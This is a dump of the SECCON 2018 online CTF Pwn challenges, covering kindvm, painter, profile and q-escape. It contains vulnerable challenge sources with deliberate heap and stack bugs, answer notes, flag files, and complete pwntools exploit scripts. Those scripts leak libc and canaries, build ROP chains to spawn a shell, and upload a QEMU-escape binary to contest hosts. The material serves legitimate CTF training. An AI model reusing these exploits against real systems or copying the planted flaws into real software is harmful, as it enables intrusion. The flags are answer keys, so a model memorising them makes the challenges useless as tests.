 80 | 	print(s.recv(1024))
 81 | 	
 82 | def get_hint3(s):
 83 | 	s.recv(1024)	# Input your name :
 84 | 	buf = 'user'
 85 | 	buf += '\n'
 86 | 	s.send(buf)
 87 | 
 88 | 	s.recv(1024)	# Input instruction : 
 89 | 	buf = vm_in(0,0xbfffffff)
 90 | 	buf += vm_in(1,0x00000001)
 91 | 	buf += vm_add(0,1)
 92 | 	buf += '\n'
 93 | 	s.send(buf)
 94 | 	print(s.recv(1024))
 95 | 
 96 | def get_flag(s):
 97 | 	s.recv(1024)	# Input your name :
 98 | 	buf = 'flag.txt'
 99 | 	buf += '\n'
100 | 	s.send(buf)
101 | 
102 | 	s.recv(1024)	# Input instruction : 
103 | 	buf = vm_load(0,0xffd8)
104 | 	buf += vm_store(0xffdc,0)
105 | 	buf += vm_halt()
106 | 	buf += '\n'
107 | 	s.send(buf)
108 | 	print(s.recv(1024))
109 | 
110 | 
111 | def main():
112 | 	s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
113 | 	s.connect(("localhost",12345))
114 | 
115 | 	# get_hint1(s)
116 | 	# get_hint2(s)
117 | 	# get_hint3(s)
118 | 
119 | 	get_flag(s)
120 | 
121 | 
122 | if __name__ == '__main__':
123 | 	main()
124 | 


--------------------------------------------------------------------------------
/Pwn/kindvm/files/kindvm_79726158fec11eb1e5a89351db017e13506d3a4a:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Pwn/kindvm/files/kindvm_79726158fec11eb1e5a89351db017e13506d3a4a


--------------------------------------------------------------------------------
/Pwn/kindvm/flag.txt:
--------------------------------------------------------------------------------
1 | SECCON{s7ead1ly_5tep_by_5tep}
2 | 


--------------------------------------------------------------------------------
/Pwn/kindvm/question.txt:
--------------------------------------------------------------------------------
1 | kindvm
2 | 
3 | Get hints, and pwn it! kindvm.pwn.seccon.jp:12345
4 | 


--------------------------------------------------------------------------------
/Pwn/painter/answer.txt:
--------------------------------------------------------------------------------
1 | Floating precision error to OOB read & write
2 | 
3 | OOB read occurs in resize_img due to precision error, OOB write occurs in draw_a_line due to same reason, both in commands.cc.
4 | 
5 | Exploiter may consider tcache to OOB read and leak libc pointer. Then one can trigger underflow on pixel_array to overwrite width, height with specified color, then resize with size larger than MMAP_THRESHOLD, and overwrite libc pointers.
6 | 
7 | I used magic gadget to exploit this.


--------------------------------------------------------------------------------
/Pwn/painter/build/.gitignore:
--------------------------------------------------------------------------------
1 | .gdb_history
2 | 


--------------------------------------------------------------------------------
/Pwn/painter/build/Makefile:
--------------------------------------------------------------------------------
 1 | # ASAN := -fsanitize=address  -fno-sanitize-recover
 2 | CXXFLAGS := -fPIC -g -O2 -std=c++11 ${ASAN}
 3 | LDFLAGS := -g -Wl,-z,relro,-z,now -pie ${ASAN}
 4 | 
 5 | all: painter
 6 | 
 7 | painter: bmp.o main.o commands.o commands.h bmp.h main.h Makefile
 8 | 	$(CXX) $(LDFLAGS) -o painter bmp.o main.o commands.o
 9 | 	strip ./painter
10 | 
11 | clean:
12 | 	rm -f painter *.o
13 | 


--------------------------------------------------------------------------------
/Pwn/painter/build/bmp.cc:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <stdlib.h>
 3 | #include <stdint.h>
 4 | #include "bmp.h"
 5 | 
 6 | #pragma pack(push, 1)
 7 | //BMP header//
 8 | struct BmpHeader {
 9 | 	char ident[2];
10 | 	uint32_t file_size;
11 | 	char reserve_1[2];
12 | 	char reserve_2[2];
13 | 	uint32_t pix_array_offset;
14 | };
15 | 
16 | //DIB Header//
17 | struct BITMAPINFOHEADER {
18 | 	uint32_t size;
19 | 	uint32_t width;
20 | 	uint32_t height;
21 | 	char colour_plain[2];
22 | 	uint16_t bbp;			//colour depth
23 | 	char compression_method[4];
24 | 	uint32_t img_size; 		//raw bitmap size
25 | 	char horizontal_res[4]; 
26 | 	char vertical_res[4]; 
27 | 	char num_colours[4]; 		//colours in colour pallet
28 | 	char important_colours[4]; 
29 | };
30 | 
31 | #pragma pack(pop)
32 | 
33 | struct image *create_image(uint32_t width, uint32_t height) {
34 | 	if(width > MAX_LEN || height > MAX_LEN) {
35 | 		puts("image creation: image too large!");
36 | 		return NULL;
37 | 	}
38 | 	struct image *img = (struct image *)calloc((width * height + 1) * sizeof(color_t) + sizeof(uint32_t) * 2, 1);
39 | 
40 | 	img->width = width;
41 | 	img->height = height;
42 | 
43 | 	return img;
44 | }
45 | 
46 | 


--------------------------------------------------------------------------------
/Pwn/painter/build/bmp.h:
--------------------------------------------------------------------------------
 1 | #include <stdint.h>
 2 | 
 3 | //structure to hold all necessary image data
 4 | typedef struct {
 5 | 	uint8_t r, g, b;
 6 | } color_t;
 7 | 
 8 | struct image {
 9 | 	uint32_t width;
10 | 	uint32_t height;
11 | 	color_t  color;
12 | 	color_t  pixel_array[];
13 | };
14 | 
15 | static inline color_t *XY(struct image *img, float x, float y) {
16 | 	return &img->pixel_array[(int)(y * img->width + x)];
17 | }
18 | 
19 | struct image *create_image(uint32_t width, uint32_t height);
20 | //free the memory used by the images pixel data
21 | void free_img(unsigned char *pixel_array, struct image *img);
22 | 
23 | #define MAX_LEN 8192
24 | 


--------------------------------------------------------------------------------
/Pwn/painter/build/bmp.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Pwn/painter/build/bmp.o


--------------------------------------------------------------------------------
/Pwn/painter/build/commands.cc:
--------------------------------------------------------------------------------
  1 | #include "bmp.h"
  2 | #include "commands.h"
  3 | #include <stdio.h>
  4 | #include <stdlib.h>
  5 | #include <math.h>
  6 | 
  7 | bool check_bound(struct image **img, float x, float y) {
  8 | 	bool r = (x >= 0 && x <= (*img)->width) && (y >= 0 && y <= (*img)->height);
  9 | 	if(!r) {
 10 | 		puts("bound error");
 11 | 	}
 12 | 	return r;
 13 | }
 14 | 
 15 | // leak
 16 | // how to leak?
 17 | // heap feng shui: [ ... new_img ... ] [ unsorted chunk ]
 18 | // to make unsorted chunk, just make [img a] -> [img a freed] [img b fastbin alloc] -> [img c] [remainder unsorted] [img b fastbin freed]
 19 | bool resize_img(struct image** img, const char *args)
 20 | {
 21 | 	float w, h;
 22 | 	if(sscanf(args, " %f %f", &w, &h) != 2) return false;
 23 | 
 24 | 	w = floor(w);
 25 | 	h = floor(h);
 26 | 
 27 | 	float x = 0, y = 0;
 28 | 
 29 | 	auto *new_img = create_image(w, h);
 30 | 	if(!new_img) return false;
 31 | 
 32 | 	new_img->color = (*img)->color;
 33 | 
 34 | 	float zoomX = (*img)->width / w;
 35 | 	float zoomY = (*img)->height / h;
 36 | 
 37 | 	for(float i=0; i < h; i++)
 38 | 	{
 39 | 		x = 0;
 40 | 		for(float j=0; j < w; j++)
 41 | 		{
 42 | 			*XY(new_img, j, i) = *XY(*img, x, y);
 43 | 			x += zoomX;
 44 | 		}
 45 | 		y += zoomY;
 46 | 	}
 47 | 	free(*img);
 48 | 	*img = new_img;
 49 | 	return true;
 50 | }
 51 | 
 52 | // oob
 53 | bool draw_a_line(struct image **img, const char *args)
 54 | {
 55 | 	float x1, x2, y1, y2, delta;
 56 | 	float x, y;
 57 | 	float deltaX, deltaY;
 58 | 
 59 | 	int i = 0, count;
 60 | 
 61 | 	if(sscanf(args, " %f %f %f %f %f", &x1, &y1, &x2, &y2, &delta) != 5) {
 62 | 		puts("format error! : line x1 y1 x2 y2 delta");
 63 | 		return false;
 64 | 	}
 65 | 
 66 | 	if(!check_bound(img, x1, y1)) return false;
 67 | 	if(!check_bound(img, x2, y2)) return false;
 68 | 
 69 | 	count = ((y2 - y1) * (y2 - y1) + (x2 - x1) * (x2 - x1)) / delta;
 70 | 
 71 | 	deltaX = (x2 - x1) / count;
 72 | 	deltaY = (y2 - y1) / count;
 73 | 
 74 | 	if(count > 100000) {
 75 | 		puts("delta too small!");
 76 | 		return false;
 77 | 	}
 78 | 
 79 | 	for(i = 0, x = x1, y = y1; i < count; i++, x += deltaX, y += deltaY) {
 80 | 		*XY(*img, x, y) = (*img)->color;
 81 | 	}
 82 | 	return true;
 83 | }
 84 | 
 85 | // this doesn't have delta, should be easier than drawing a line to fill some data
 86 | bool draw_a_rectangle(struct image **img, const char *args)
 87 | {
 88 | 	float x1, x2, y1, y2;
 89 | 	float x, y;
 90 | 	if(sscanf(args, " %f %f %f %f", &x1, &y1, &x2, &y2) != 4) {
 91 | 		puts("format error! : rectangle x1 x2 y1 y2");
 92 | 		return false;
 93 | 	}
 94 | 
 95 | 	if(x1 >= x2 || y1 >= y2) {
 96 | 		puts("rectangle range error! must be x1 < x2, y1 < y2");
 97 | 		return false;
 98 | 	}
 99 | 
100 | 	if(!check_bound(img, x1, y1)) return false;
101 | 	if(!check_bound(img, x2, y2)) return false;
102 | 
103 | 	for(y = y1; y < y2; y++) {
104 | 		for(x = x1; x < x2; x++) {
105 | 			*XY(*img, x, y) = (*img)->color;
106 | 		}
107 | 	}
108 | 	return true;
109 | }
110 | 
111 | // value to write
112 | bool select_a_color(struct image **img, const char *args) {
113 | 	uint8_t r, g, b;
114 | 	if(sscanf(args, " #%02hhX%02hhX%02hhX", &r, &g, &b) != 3) {
115 | 		puts("format error!: color #XXXXXX");
116 | 		return false;
117 | 	}
118 | 	(*img)->color = {r, g, b};
119 | 	return true;
120 | }
121 | 
122 | bool dump_image(struct image **img, const char *args)
123 | {
124 | 	fwrite((*img)->pixel_array, (*img)->width * (*img)->height * sizeof(color_t), 1, stdout);
125 | 	return true;
126 | }


--------------------------------------------------------------------------------
/Pwn/painter/build/commands.h:
--------------------------------------------------------------------------------
1 | bool resize_img(struct image **img, const char *args);
2 | bool draw_a_line(struct image **img, const char *args);
3 | bool select_a_color(struct image **img, const char *args);
4 | bool draw_a_rectangle(struct image **img, const char *args);
5 | bool dump_image(struct image **img, const char *args);
6 | 


--------------------------------------------------------------------------------
/Pwn/painter/build/commands.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Pwn/painter/build/commands.o


--------------------------------------------------------------------------------
/Pwn/painter/build/main.cc:
--------------------------------------------------------------------------------
  1 | #include <stdio.h>
  2 | #include <stdlib.h>
  3 | #include <strings.h>
  4 | #include <string.h>
  5 | #include <unistd.h>
  6 | #include <math.h>
  7 | #include <sys/stat.h> 
  8 | #include <fcntl.h>
  9 | #include "bmp.h"
 10 | #include "commands.h"
 11 | #include "main.h"
 12 | 
 13 | int getnline(char *buf, int size){
 14 | 	char *lf;
 15 | 	char *n;
 16 | 
 17 | 	if(size < 1 || (n = fgets(buf, size, stdin)) <= 0)
 18 | 		return 0;
 19 | 
 20 | 	if((lf=strchr(buf,'\n')))
 21 | 		*lf='\0';
 22 | 
 23 | 	return 1;
 24 | }
 25 | 
 26 | int getint(void){
 27 | 	char buf[0x10]={0};
 28 | 
 29 | 	getnline(buf, sizeof(buf));
 30 | 	return atoi(buf);
 31 | }
 32 | 
 33 | 
 34 | const cmditem_t kCommands[] = {
 35 | 	{"resize", &resize_img},
 36 | 	{"color", &select_a_color},
 37 | 	{"line", &draw_a_line},
 38 | 	{"rectangle", &draw_a_rectangle},
 39 | 	{"dump", &dump_image}
 40 | };
 41 | 
 42 | const cmditem_t *find_command(const char *cmd) {
 43 | 	// Find commands by name
 44 | 	for(int i = 0; i < sizeof(kCommands) / sizeof(kCommands[0]); i++) {
 45 | 		const cmditem_t *cur = &kCommands[i];
 46 | 		if(strcmp(cur->name, cmd)) continue;
 47 | 
 48 | 		return cur;
 49 | 	}
 50 | 	return NULL;
 51 | }
 52 | 
 53 | char empty[] = "";
 54 | 
 55 | int main()
 56 | {
 57 | 	struct image* img = NULL;
 58 | 	char buf[0x1000];
 59 | 	uint32_t width, height;
 60 | 
 61 | 	alarm(60);
 62 | 
 63 | 	setvbuf(stdout, 0, 2, 0);
 64 | 	setvbuf(stdin, 0, 2, 0);
 65 | 
 66 | 	while(true) {
 67 | 		puts("Give me your data size (width height): ");
 68 | 		if(!getnline(buf, sizeof(buf))) return 1;
 69 | 
 70 | 		if(sscanf(buf, " %d %d", &width, &height) == 2) break;
 71 | 	}
 72 | 
 73 | 	img = create_image(width, height);
 74 | 
 75 | 	if(img) {
 76 | 		printf("load done\nwidth: %d\nheight: %d\n", width, height);
 77 | 	}
 78 | 	else {
 79 | 		puts("width / height too large");
 80 | 		return 1;
 81 | 	}
 82 | 
 83 | 	while(1) {
 84 | 		if(!getnline(buf, sizeof(buf))) return 1;
 85 | 
 86 | 		char *args = strchr(buf, ' ');
 87 | 		if(!args) args = empty;
 88 | 		else *args++ = '\0';
 89 | 
 90 | 		const cmditem_t *cmd = find_command(buf);
 91 | 		if(!cmd) break;
 92 | 
 93 | 		if(cmd->handler(&img, args)) {
 94 | 			printf("%s success!\n", cmd->name);
 95 | 		} else {
 96 | 			printf("%s failed!\n", cmd->name);
 97 | 		}
 98 | 	}
 99 | 
100 | 	puts("bye!");
101 | 	return 0;
102 | }
103 | 


--------------------------------------------------------------------------------
/Pwn/painter/build/main.h:
--------------------------------------------------------------------------------
1 | typedef bool (*cmdhandler_t)(struct image **, const char *args);
2 | 
3 | typedef struct {
4 | 	const char *name;
5 | 	cmdhandler_t handler;
6 | } cmditem_t;
7 | 


--------------------------------------------------------------------------------
/Pwn/painter/build/main.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Pwn/painter/build/main.o


--------------------------------------------------------------------------------
/Pwn/painter/build/painter:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Pwn/painter/build/painter


--------------------------------------------------------------------------------
/Pwn/painter/exploit.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | import os
 3 | 
 4 | HOST, PORT = 'painter.pwn.seccon.jp', 1337
 5 | 
 6 | ii = lambda *args: map(lambda x: r.sendline(str(x)), args)
 7 | system = 0x45390
 8 | 
 9 | def cmd(x, verbose=False):
10 | 	print x
11 | 	ii(x)
12 | 	d = r.recvuntil(x.split(' ')[0] + ' success!\n')
13 | 	if verbose:
14 | 		print d
15 | 
16 | def dump():
17 | 	ii('dump')
18 | 	return r.recvuntil('dump success!\n', drop=True)
19 | 
20 | # pause()
21 | # width, height: non-fastbin size
22 | width = 32
23 | r = remote(HOST, PORT)
24 | ii('%d %d' % (0x20, 0x10))
25 | cmd('color #414141')
26 | pause()
27 | if True:
28 | 	# width, height: fastbin size
29 | 	cmd('resize %d %d' % (width, 2))
30 | 	pause()
31 | 	# width, height: not-0x40 size
32 | 	cmd('resize %d %d' % (width, 2))
33 | 	cmd('resize %d %d' % (width, 15))
34 | 	data = dump()
35 | 	print hexdump(data)
36 | 
37 | 	arena = u64(data[0x510:][:8])
38 | 	print hex(arena)
39 | 
40 | randfloat = lambda: abs(struct.unpack("<f", os.urandom(4))[0]+1)
41 | 
42 | width, height = 4096, 512
43 | cmd('resize %d %d' % (width, height))
44 | def overwrite(color):
45 | 	cmd('color ' + color)
46 | 	cmd('line 988 1 0.000000 0.000000 10')
47 | 
48 | overwrite('#FFFFFF')
49 | target = width * height * 3 + 0x1000 - 0x18
50 | target += 0x3ed8e8
51 | targetX = target / 3 % 4096
52 | targetY = target / 3 / 4096
53 | color = arena-0x3ec0e0
54 | print hex(color)
55 | gadget=system
56 | gadget=0x10a38c
57 | color = color + gadget
58 | color <<= (target % 3) * 8
59 | rgb = lambda color: '%02x%02x%02x' % (color & 0xff, (color >> 8) & 0xff, (color >> 16))
60 | targetX -= 1
61 | for i in range(4):
62 | 	pause()
63 | 
64 | 	cmd('color #%s' % rgb(color & 0xffffff))
65 | 	cmd('rectangle %d %d %d %d' % (targetX, targetY, targetX + 1, targetY + 1))
66 | 	targetX += 1
67 | 	color >>= 24
68 | 
69 | overwrite('#000000')
70 | ii('resize 0 0')
71 | r.interactive()
72 | 


--------------------------------------------------------------------------------
/Pwn/painter/files/README.md:
--------------------------------------------------------------------------------
1 | # File to deploy
2 | 
3 | Deploy files in this directory except README.md
4 | 
5 | sha256sum of libc.so.6 : cd7c1a035d24122798d97a47a10f6e2b71d58710aecfd392375f1aa9bdde164d
6 | sha256sum of painter : 36e2ff5a62fc843bcfb286f43e0c0064e543ec7ab03ad1dd2bfa6375ccc10cf7
7 | 


--------------------------------------------------------------------------------
/Pwn/painter/files/painter.zip_45a35d4edf812a8919c0558558ef5fb6f7b8f694:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Pwn/painter/files/painter.zip_45a35d4edf812a8919c0558558ef5fb6f7b8f694


--------------------------------------------------------------------------------
/Pwn/painter/flag.txt:
--------------------------------------------------------------------------------
1 | SECCON{6568e57ce3ae8c8f1e24441d7861bae8}
2 | 


--------------------------------------------------------------------------------
/Pwn/painter/question.txt:
--------------------------------------------------------------------------------
1 | painter
2 | 
3 | Ubuntu 18.04
4 | nc painter.pwn.seccon.jp 1337
5 | 


--------------------------------------------------------------------------------
/Pwn/profile/build/profile.cpp:
--------------------------------------------------------------------------------
  1 | #include <iostream>
  2 | #include <iomanip>
  3 | #include <unistd.h>
  4 | #include <stdio.h>
  5 | #include <malloc.h>
  6 | 
  7 | using namespace std;
  8 | 
  9 | int getn(char *buf, unsigned size);
 10 | 
 11 | class Profile {
 12 | 	private:
 13 | 		string msg;
 14 | 		string name;
 15 | 		int age;
 16 | 
 17 | 	public:
 18 | 		Profile(){
 19 | 			name = "";
 20 | 			age = 0;
 21 | 			msg = "";
 22 | 		};
 23 | 
 24 | 		void set_name(string n){ name = n; };
 25 | 		void set_age(int a){ age = a; };
 26 | 		void set_msg(string m){ msg = m; };
 27 | 
 28 | 		void update_msg(void);
 29 | 		void show(void);
 30 | };
 31 | 
 32 | void Profile::update_msg(void){
 33 | 	char *buf;
 34 | 	size_t size;
 35 | 
 36 | 	buf = (char*)msg.c_str();
 37 | 	if(!(size = malloc_usable_size(buf))){
 38 | 		cout << "Unable to update message." << endl;
 39 | 		return;
 40 | 	}
 41 | 
 42 | 	cout << "Input new message >> ";
 43 | 	getn(buf, size);
 44 | }
 45 | 
 46 | void Profile::show(void){
 47 | 	cout << "Name : " << name << endl;
 48 | 	cout << "Age  : " << age << endl;
 49 | 	cout << "Msg  : " << msg << endl;
 50 | }
 51 | 
 52 | __attribute__((constructor))
 53 | void init(void){
 54 | 	setbuf(stdout, NULL);
 55 | 	setbuf(stderr, NULL);
 56 | }
 57 | 
 58 | int main(void){
 59 | 	Profile p;
 60 | 
 61 | 	string s;
 62 | 	int n;
 63 | 
 64 | 	cout << "Please introduce yourself!" << endl;
 65 | 	cout << "Name >> ";
 66 | 	cin >> s;
 67 | 	p.set_name(s);
 68 | 
 69 | 	cout << "Age >> ";
 70 | 	cin >> n;
 71 | 	p.set_age(n);
 72 | 
 73 | 	cout << "Message >> ";
 74 | 	cin >> s;
 75 | 	p.set_msg(s);
 76 | 
 77 | 	do {
 78 | 		cout << endl
 79 | 			 << "1 : update message" << endl
 80 | 			 << "2 : show profile" << endl
 81 | 			 << "0 : exit" << endl
 82 | 			 << ">> ";
 83 | 		cin >> n;
 84 | 		getchar();
 85 | 		switch(n){
 86 | 			case 1:
 87 | 				p.update_msg();
 88 | 				break;
 89 | 			case 2:
 90 | 				p.show();
 91 | 				break;
 92 | 			default:
 93 | 				cout << "Wrong input..." << endl;
 94 | 		}
 95 | 	} while(n);
 96 | }
 97 | 
 98 | int getn(char *buf, unsigned size){
 99 | 	char c;
100 | 	unsigned i;
101 | 
102 | 	for(i=0; i<size; i++){
103 | 		read(STDIN_FILENO, &c, 1);
104 | 		if(!(c^'\n'))
105 | 			break;
106 | 		buf[i] = c;
107 | 	}
108 | 
109 | 	return i;
110 | }
111 | 


--------------------------------------------------------------------------------
/Pwn/profile/exploit.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | from sc_expwn import *  # https://raw.githubusercontent.com/shift-crops/sc_expwn/master/sc_expwn.py
 3 | import re
 4 | 
 5 | bin_file = './profile'
 6 | context(os = 'linux', arch = 'amd64')
 7 | # context.log_level = 'debug'
 8 | 
 9 | #==========
10 | 
11 | env = Environment('debug', 'local', 'remote')
12 | env.set_item('mode',    debug = 'DEBUG', local = 'PROC', remote = 'SOCKET')
13 | env.set_item('target',  debug   = {'argv':[bin_file], 'aslr':False}, \
14 |                         local   = {'argv':[bin_file]}, \
15 |                         remote  = {'host':'profile.pwn.seccon.jp', 'port':28553})
16 | env.set_item('libc',    debug   = None, \
17 |                         local   = None, \
18 |                         remote  = 'libc-2.23.so')
19 | env.select()
20 | 
21 | #==========
22 | 
23 | binf = ELF(bin_file)
24 | 
25 | libc = ELF(env.libc) if env.libc else binf.libc
26 | offset_libc_main    = libc.sep_function['__libc_start_main']
27 | 
28 | #==========
29 | 
30 | def attack(conn):
31 |     prof = Profile(conn, 'a'*8, 0, 'x')
32 | 
33 |     for i in range(0, 0x100, 8):
34 |         prof.update('X'*0x10+chr(i))
35 |         if prof.show()['Name'] == 'a'*8:
36 |             x = i-0x10
37 | 
38 |     prof.update('X'*0x10+chr(x))
39 |     addr_stack = u(prof.show()['Name'])
40 |     info('addr_stack        = 0x{:08x}'.format(addr_stack))
41 | 
42 |     prof.update('X'*0x10+p64(addr_stack+0x28))
43 |     canary = u(prof.show()['Name'])
44 |     info('canary            = 0x{:08x}'.format(canary))
45 | 
46 |     prof.update('X'*0x10+p64(addr_stack+0x48))
47 |     addr_libc_main = u(prof.show()['Name']) - 0xf0
48 |     libc.address = addr_libc_main - offset_libc_main
49 |     info('addr_libc_base    = 0x{:08x}'.format(libc.address))
50 |     addr_libc_system    = libc.sep_function['system']
51 |     addr_libc_str_sh    = next(libc.search('/bin/sh'))
52 | 
53 |     rop = ROP(binf)
54 | 
55 |     exploit  = 'X'*0x10
56 |     exploit += p64(addr_stack + 0x10)
57 |     exploit += 'Y'*0x20
58 |     exploit += p64(canary)
59 |     exploit += 'Z'*0x18
60 |     exploit += p64(rop.rdi.address)
61 |     exploit += p64(addr_libc_str_sh)
62 |     exploit += p64(addr_libc_system)
63 |     prof.update(exploit)
64 | 
65 |     conn.sendlineafter('>> ', '0')
66 |     
67 | class Profile:
68 |     def __init__(self, conn, name, age, msg):
69 |         self.recvuntil      = conn.recvuntil
70 |         self.recv           = conn.recv
71 |         self.sendline       = conn.sendline
72 |         self.send           = conn.send
73 |         self.sendlineafter  = conn.sendlineafter
74 |         self.sendafter      = conn.sendafter
75 | 
76 |         self.sendlineafter('Name >> ', name)
77 |         self.sendlineafter('Age >> ', str(age))
78 |         self.sendlineafter('Message >> ', msg)
79 | 
80 |     def update(self, msg):
81 |         self.sendlineafter('>> ', '1')
82 |         self.sendlineafter('message >> ', msg)
83 | 
84 |     def show(self):
85 |         self.sendlineafter('>> ', '2')
86 |         data = self.recvuntil('\n\n', drop=True)
87 |         data = re.findall(r'(.*) : (.*)', data)
88 |         return dict(data)
89 | 
90 | #==========
91 | 
92 | if __name__=='__main__':
93 |     conn = communicate(env.mode, **env.target)
94 |     attack(conn)
95 |     conn.interactive()
96 |     
97 | #==========
98 | 


--------------------------------------------------------------------------------
/Pwn/profile/files/libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Pwn/profile/files/libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253


--------------------------------------------------------------------------------
/Pwn/profile/files/profile_e814c1a78e80ed250c17e94585224b3f3be9d383:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Pwn/profile/files/profile_e814c1a78e80ed250c17e94585224b3f3be9d383


--------------------------------------------------------------------------------
/Pwn/profile/flag.txt:
--------------------------------------------------------------------------------
1 | SECCON{57r1ng_l0c4710n_15_n07_0nly_h34p}
2 | 


--------------------------------------------------------------------------------
/Pwn/profile/question.txt:
--------------------------------------------------------------------------------
1 | Profile
2 | 
3 | Host: profile.pwn.seccon.jp
4 | Port: 28553
5 | 


--------------------------------------------------------------------------------
/Pwn/q-escape/README.md:
--------------------------------------------------------------------------------
1 | # q-escape
2 | We developed a new device named CYDF :)
3 | 


--------------------------------------------------------------------------------
/Pwn/q-escape/exp.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Pwn/q-escape/exp.gz


--------------------------------------------------------------------------------
/Pwn/q-escape/exploit.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | from hashlib import md5
 3 | import sys, os
 4 | 
 5 | def pow(prefix):
 6 |     i = 0
 7 |     while True:
 8 |         if md5(prefix + "%x"%i).hexdigest().startswith('000000'):
 9 |             log.info('Found : ' + hex(i))
10 |             return hex(i)[2:]
11 |         i += 1
12 | 
13 | if __name__ == '__main__':
14 |     s = remote('q-escape.pwn.seccon.jp', 1337)
15 |     prefix = s.recvuntil(': ').split('md5("')[1].split('"')[0]
16 |     s.sendline(pow(prefix))
17 |     
18 |     s.recvuntil("/ # ")
19 |     s.sendline("touch b")
20 | 
21 |     exploit = open('exp.gz', 'rb').read()
22 |     exploit_b64 = exploit.encode('base64')
23 | 
24 |     for i in range(0, len(exploit_b64), 1000):
25 |         s.recvuntil("/ # ")
26 |         command = "echo -ne \"" + exploit_b64[i:i+1000] + "\" >> b"
27 |         s.sendline(command)
28 | 
29 |     s.sendline("")
30 |     s.sendline("")
31 |     s.sendlineafter("/ # ", "cat b | base64 -d > a.gz")
32 |     s.sendlineafter("/ # ", "gzip -d a.gz")
33 |     s.sendlineafter("/ # ", "chmod +x ./a")
34 |     s.sendlineafter("/ # ", "./a")
35 |     s.recvuntil('/ # ./a')
36 |     re = s.recvuntil('wait for leak...')
37 |     print re
38 |     libc = int(re.split('\n')[-3].split(' ')[3], 16) - 0xd7499d
39 |     log.info('libc base : ' + hex(libc))
40 |     s.sendline('{0}'.format(hex(libc)))
41 |     s.interactive()
42 |     s.close()
43 | 


--------------------------------------------------------------------------------
/Pwn/q-escape/files/README.md:
--------------------------------------------------------------------------------
1 | # File to deploy
2 | 
3 | Deploy files in this directory except README.md
4 | 
5 | sha256sum of q-escape.tar.gz : 04582d0b2d33f2458cd2f307aaf6340f8486c6c32fd154e95075bf21e893f8c6
6 | 


--------------------------------------------------------------------------------
/Pwn/q-escape/files/q-escape.tar.gz_48901602a841daf68b60926a26efd4a80ad66c4c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Pwn/q-escape/files/q-escape.tar.gz_48901602a841daf68b60926a26efd4a80ad66c4c


--------------------------------------------------------------------------------
/Pwn/q-escape/flag.txt:
--------------------------------------------------------------------------------
1 | SECCON{6767ac011b200bde1249d241b1cd5480}
2 | 


--------------------------------------------------------------------------------
/Pwn/q-escape/poc.c:
--------------------------------------------------------------------------------
  1 | #include <assert.h>
  2 | #include <stdint.h>
  3 | #include <unistd.h>
  4 | #include <stdio.h>
  5 | #include <stdlib.h>
  6 | #include <string.h>
  7 | #include <fcntl.h>
  8 | #include <sys/mman.h>
  9 | #include <sys/io.h>
 10 | 
 11 | void *iomem;
 12 | char *cydf;
 13 | char tmp[8];
 14 | 
 15 | void die (const char* msg) {
 16 |   perror(msg);
 17 |   exit(-1);
 18 | }
 19 | 
 20 | void iowrite8(uint32_t offset, uint32_t value) {
 21 |   *((uint8_t*)(iomem + offset)) = value;
 22 | }
 23 | 
 24 | void iowrite16(uint32_t offset, uint32_t value) {
 25 |   *((uint16_t*)(iomem + offset)) = value;
 26 | }
 27 | 
 28 | void sr(uint32_t idx, uint32_t val) {
 29 |   sleep(0.5);
 30 |   iowrite8(0x3c4 - 0x3b0 - 0x10, idx);
 31 |   iowrite8(0x3c5 - 0x3b0 - 0x10, val);
 32 | }
 33 | void add(uint32_t size) {
 34 |   sr(0xcc, 0x00);
 35 |   sr(0xce, (size>>0x8) & 0xff);
 36 |   cydf[0x19000] = (size & 0xff);
 37 | }
 38 | void set(uint8_t idx, uint8_t val) {
 39 |   sr(0xcc, 0x01);
 40 |   sr(0xcd, idx);
 41 |   cydf[0x19000] = (val & 0xff);
 42 | }
 43 | void show(uint8_t idx) {
 44 |   sr(0xcc, 0x02);
 45 |   sr(0xcd, idx);
 46 |   cydf[0x19000] = 0x00;
 47 | }
 48 | void update(uint8_t idx, uint32_t size) {
 49 |   sr(0xcc, 0x03);
 50 |   sr(0xcd, idx);
 51 |   sr(0xce, (size >> 8) & 0xff);
 52 |   cydf[0x19000] = (size & 0xff);
 53 | }
 54 | void leak() {
 55 |   char *str = "%p %p %p %p %p %p %p %p %p %p %p %p %p\n";
 56 |   int len = strlen(str);
 57 |   for (int i = 0; i < len; i++) set(0x00, str[i]);
 58 |   show(0x0);  
 59 | }
 60 | int main (int argc, char *argv[]) {
 61 |   int fd;
 62 |   if(access("/dev/mem", 00)) system("mknod -m 660 /dev/mem c 1 1");
 63 |   int mem = open("/dev/mem", O_RDWR | O_SYNC);
 64 |   if(mem == -1) die("mem");
 65 | 
